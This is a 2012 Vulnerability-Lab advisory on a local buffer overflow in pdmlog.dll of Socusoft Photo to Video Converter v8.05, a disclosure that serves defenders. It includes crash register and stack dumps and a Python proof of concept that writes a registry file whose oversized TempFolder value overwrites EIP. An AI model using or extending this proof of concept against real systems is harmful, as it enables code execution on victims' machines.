1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 |
Title: ====== Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability Date: ===== 2012-02-27 References: =========== http://www.vulnerability-lab.com/get_content.php?id=460 VL-ID: ===== 460 Introduction: ============= Socusoft photo to video converter Professional allows you to create all kinds of eye-catching slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264, h.264 HD, 3gp, 3gpp2, swf ) playable on YouTube, Facebook, MySpace, iPod, iPad, iphone, Archos, PSP, Zune. With the powerful Photo to Video Converter Professional,you could convert photo to the animating and dynamic video and share the video on YouTube, Facebook, MySpace, iPod, iPad, iPhone. With just a few minutes of work, you\\\'ll have an eye-catching slideshow video with background music and dynamic pan&zoom and attractive transition effects. This powerful Photo to Video Converter Professional supports Over 260 animating transition effects with Pan & Zoom effect. (Copy of the Vendor Homepage:) Abstract: ========= A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Socusofts Photo to Video Converter Free and Professional v8.05 Report-Timeline: ================ 2012-02-27: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== Socusoft Photo 2 Video v8.05 Exploitation-Technique: ======================= Local Severity: ========= High Details: ======== A Buffer Overflow vulnerability is detected on Socusoft Photo to Video Converter Free and Professional v8.05 (current version). The vulnerability is located in the pdmlog.dll. Successful exploitation can result in execution of code, overwrite of registers & system compromise. Vulnerable DLL(s): [+] pdmlog.dll --- Registers --- # EAX 42424242 # EBX 00360000 pdmlog.dll:00360000 # ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B # EDX 80284006 # ESI 00000002 # EDI 00000000 # EBP 01C5FC0C Stack[000001AC]:01C5FC0C # ESP 01C5FBF0 Stack[000001AC]:01C5FBF0 # EIP 42424242 # EFL 00010206 --- Stack --- # 01C5FBE000000000 # 01C5FBE400000002 # 01C5FBE8000094B7 # 01C5FBEC00000001 # 01C5FBF00036BF6Fpdmlog.dll:pdmlog_5+A69F<- Crash # 01C5FBF400360000pdmlog.dll:00360000 # 01C5FBF800000002 # 01C5FBFC00000000 # 01C5FC0000000000 # 01C5FC0401C5FC20Stack[000001AC]:01C5FC20 # 01C5FC087FFDE000debug066:7FFDE000 --- Dump --- # 0037058441 41 41 41 41 41 41 4141 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA # 0037059441 41 41 41 41 41 41 4141 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA # 003705A442 42 42 42 43 43 43 4343 43 43 43 43 43 43 43BBBBCCCCCCCCCCCC # 003705B443 43 43 43 43 43 43 4343 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC # 003705C443 43 43 43 43 43 43 4343 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC Picture(s): ../1.png Proof of Concept: ================= The Vulnerability can be exploited by local attackers. For demonstration or reproduce ... #!/usr/bin/python # Exploit Title: Socusoft Photo to Video Converter Free/Pro v8.05 (pdmlog.dll) Local Buffer Overflow PoC # Version: 8.05 # Date:2012-02-26 # Author:Julien Ahrens # Homepage:http://www.inshell.net # Software Link: http://www.socusoft.com # Tested on: Windows XP SP3 Professional German # Notes: Overflow occurs in pdmlog.dll # Howto: Import Reg -> Start App # EAX 42424242 # EBX 00360000 pdmlog.dll:00360000 # ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B # EDX 80284006 # ESI 00000002 # EDI 00000000 # EBP 01C5FC0C Stack[000001AC]:01C5FC0C # ESP 01C5FBF0 Stack[000001AC]:01C5FBF0 # EIP 42424242 # EFL 00010206 # 01C5FBE000000000 # 01C5FBE400000002 # 01C5FBE8000094B7 # 01C5FBEC00000001 # 01C5FBF00036BF6Fpdmlog.dll:pdmlog_5+A69F<- Crash # 01C5FBF400360000pdmlog.dll:00360000 # 01C5FBF800000002 # 01C5FBFC00000000 # 01C5FC0000000000 # 01C5FC0401C5FC20Stack[000001AC]:01C5FC20 # 01C5FC087FFDE000debug066:7FFDE000 file="poc.reg" junk1="\x41" * 548 boom="\x42\x42\x42\x42" junk2="\x43" * 100 poc="Windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n" poc=poc + "\"TempFolder\"=\"" + junk1 + boom + junk2 + "\"" try: print "[*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; Risk: ===== The security risk of the local buffer overflow vulnerability is estimated as high(-). Credits: ======== Vulnerability Research Laboratory - Julien Ahrens(MrTuxracer)[www.inshell.net] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright � 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com |